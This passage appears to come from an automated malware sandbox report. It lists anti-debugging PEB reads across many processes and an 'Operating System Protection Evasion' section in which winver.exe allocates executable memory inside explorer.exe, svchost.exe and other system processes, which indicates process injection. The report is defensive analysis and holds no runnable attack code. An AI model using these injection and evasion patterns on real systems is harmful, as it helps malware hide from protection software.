            Source: C:\Windows\System32\dllhost.exe Code function: 30_2_00260C3F mov eax, dword ptr fs:[00000030h] 30_2_00260C3F
            Source: C:\Windows\SysWOW64\cscript.exe Code function: 31_2_04D80C3F mov eax, dword ptr fs:[00000030h] 31_2_04D80C3F
            Source: C:\Windows\System32\conhost.exe Code function: 32_2_00880C3F mov eax, dword ptr fs:[00000030h] 32_2_00880C3F
            Source: C:\Windows\System32\conhost.exe Code function: 33_2_00900C3F mov eax, dword ptr fs:[00000030h] 33_2_00900C3F
            Source: C:\Windows\System32\RuntimeBroker.exe Code function: 35_2_00890C3F mov eax, dword ptr fs:[00000030h] 35_2_00890C3F
            Source: C:\Windows\System32\RuntimeBroker.exe Code function: 36_2_00030C3F mov eax, dword ptr fs:[00000030h] 36_2_00030C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe Code function: 37_2_01530C3F mov eax, dword ptr fs:[00000030h] 37_2_01530C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe Code function: 38_2_02770C3F mov eax, dword ptr fs:[00000030h] 38_2_02770C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe Code function: 39_2_00B80C3F mov eax, dword ptr fs:[00000030h] 39_2_00B80C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe Code function: 40_2_008B0C3F mov eax, dword ptr fs:[00000030h] 40_2_008B0C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe Code function: 41_2_00B50C3F mov eax, dword ptr fs:[00000030h] 41_2_00B50C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe Code function: 42_2_02EB0C3F mov eax, dword ptr fs:[00000030h] 42_2_02EB0C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe Code function: 43_2_02D10C3F mov eax, dword ptr fs:[00000030h] 43_2_02D10C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe Code function: 44_2_02B40C3F mov eax, dword ptr fs:[00000030h] 44_2_02B40C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe Code function: 45_2_02E20C3F mov eax, dword ptr fs:[00000030h] 45_2_02E20C3F

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\explorer.exe base: 1340000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\sihost.exe base: AC0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\svchost.exe base: 910000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\svchost.exe base: 9A0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\ctfmon.exe base: A50000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\explorer.exe base: 1370000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\svchost.exe base: D40000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 110000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: AB0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\smartscreen.exe base: 290000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 900000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 180000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 190000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\svchost.exe base: D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 260000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\SysWOW64\cscript.exe base: 4D80000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\conhost.exe base: 880000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\conhost.exe base: 900000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C50000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 890000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 30000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1530000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2770000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B80000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 8B0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B50000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2EB0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2D10000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2B40000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2E20000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: BE0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2CA0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: C40000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1120000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2F40000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B30000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2F60000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 3070000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 14D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B70000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1610000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2C90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: CC0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 660000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: AD0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 14B0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1010000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: D90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F10000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 6E0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 930000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: AD0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2360000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 970000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1050000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 7B0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1020000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 9C0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 850000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: AA0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: CE0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F70000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: FC0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B40000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 20E0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 680000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B30000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2870000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2CC0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 5A0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2C60000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 12F0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B50000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2280000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: A50000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1A0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: A50000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: FD0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 600000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1040000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B30000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2C90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1240000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: AB0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: FD0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B30000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: FD0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: AE0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2380000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B80000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 7F0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2DD0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2F30000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1200000 protect: page execute and read and write
